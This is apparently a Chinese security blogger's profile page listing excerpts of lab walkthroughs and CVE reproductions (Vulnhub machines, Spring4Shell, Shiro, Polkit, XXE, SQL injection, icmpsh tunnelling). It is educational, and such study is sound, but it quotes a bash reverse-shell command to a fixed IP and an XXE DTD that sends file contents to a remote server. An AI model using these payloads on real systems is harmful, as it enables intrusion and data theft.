- 博客(31)
- 收藏
- 关注
原创 【打靶练习】vulnhub: Insanity-Hosting
Insanity-Hosting打靶记录,二次sql注入、firefox本地密码提取
2024-03-19 10:24:27
466
原创 【打靶练习】vulnhub Sar: 1
方式反弹shell均失败,猜测在这个环境下很多命令无法执行,可以利用文件上传上传一个webshell,或者上传一个php的反弹shell脚本,然后触发执行。收集到的信息:系统Ubuntu、软件apache、默认web路径/var/www/html/index.html。发现定时任务中,root用户通过finally.sh执行了write.sh,而write.sh当前用户可写。同时,发现存在文件上传功能,但是不知道上传路径无法直接利用。经过搜索,发现文件上传路径为/var/www/html/
2023-06-13 14:42:10
153
原创 【Vulnhub靶场实践】 Red:1
保姆级教程,red:1靶机一篇搞定。不只是简单记录操作步骤,磁盘爆满、shell显示乱序、反弹shell闪退等问题都有相应的解决方案。
2022-07-19 15:01:44
945
原创 CVE-2022-22965 漏洞复现学习
漏洞利用条件JDK 9+Spring 及其衍生框架使用Tomcat部署spring项目使用了POJO参数绑定Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本环境搭建Java 靶场JDK 11(必须9及9以上)Tomcat 8首先需要个实体类sdfsdfpublic class HelloWorld { private String message; public String getM
2022-04-30 21:27:30
3012
原创 CVE-2014-3529
一、 漏洞影响poi-ooxml3.10及以下二、环境搭建1. 漏洞环境使用大佬的java靶场:https://github.com/JoyChou93/java-sec-code.git。在C盘下新建1.txt,文件内容为success,用于演示文件读取2. 使用python起一个web服务用来加载远程dtd文件,在web服务目录下放置一个xxe.dtd<!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.
2022-02-28 22:04:06
4909
1
原创 Shiro反序列化漏洞研究
shiro反序列化漏洞研究实践,shiro-550 POC,shiro-721破解过程剖析,为什么shiro-721需要登录才能利用?
2021-10-31 23:11:10
409
原创 Linux反弹 shell 命令解析
Linux 反弹 shell 命令 bash -i > /dev/tcp/192.168.139.149/4444 0>&1 各部分代表的意思。
2021-08-29 22:57:20
578
原创 shiro认证绕过:CVE-2020-(1957,17523)
Apache Shiro多个版本中存在认证绕过漏洞。攻击者可构造特殊的请求绕过身份验证访问目标服务。
2021-08-12 22:42:47
1114
原创 Freemarker模板注入:CVE-2020-7477
一、漏洞名称:FusionAuth存在Freemarker模板注入导致远程命令执行二、漏洞编号:CVE-2020-7477三、漏洞描述:在FusionAuth 1.11.0之前版本存在注入漏洞,经过身份验证的用户被允许编辑电子邮件模板或主题, 远程攻击者可利用该漏洞调用在系统上执行任意命令。四、影响版本:FusionAuth <= 1.11.0五、漏洞分析通过对直接编辑freemarker模板,调用freemarker.template.utility.E
2021-08-04 21:06:48
2223
原创 XML注入:CVE-2020-29436
一、漏洞名称:Nexus Repository Manager 3 XML外部实体注入二、漏洞编号:CVE-2020-29436三、漏洞描述:2020年12月16日,360CERT监测发现Nexus Repository Manager 3发布了Nexus Repository Manager 3 命令注入漏洞 的风险通告,该漏洞编号为 CVE-2020-29436 ,漏洞等级:高危 ,漏洞评分:8.7 。拥有管理员权限的远程攻击者通过 构造特定的XML请求 ,可造成 XML外部实体注
2021-07-21 21:58:14
640
2
原创 SQL注入:布尔注入脚本
SQL注入:布尔注入脚本实现思路将payload以字典形式存储,循环遍历时对payload字符串中相应参数进行格式化。按以下顺序依次获取数据,其实四个步骤逻辑一样,都是先获取数量,然后获取长度,最后获取内容。数据库名:获取库名长度,库名数据库表:获取数据库表数量,表名长度,表名表字段:获取字段数,字段名长度,字段名表数据:获取该字段数据行数,数据长度,数据内容关键代码获取不同数据的payload字典payload_dict = { "db_name_len":
2021-07-19 21:02:05
860
1
原创 提权:CVE-2021-3560
CVE-2021-3560一、漏洞名称:Linux Polkit权限提升漏洞二、漏洞编号:CVE-2021-3560三、漏洞描述:由于linux的polkit组件错误处理了异常情况,导致权限提升。该漏洞能够使普通用户获取到root权限。四、影响版本:目前已知的版本情况。五、漏洞分析当一个命令被发送到目标程序处理时,消息发送方会被分配一个唯一总线名称(感觉有点像sessionid的意思)。当需要polkit去做权限校验时,polkit会通过唯一总线名称去查询命令发送方的U
2021-07-12 21:05:14
1102
原创 icmpsh使用
ICMP隧道:将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙通常不会过滤ping数据包),通常用于内网攻击中的绕过防火墙建立C2tongda。常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel、powershell icmp等。下载地址:https://github.com/bdamele/icmpsh使用前提: 目标主机为windows系统 本地机器安装python2环境,安装impacket类库 利用icmpsh
2021-07-11 15:14:47
1000
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人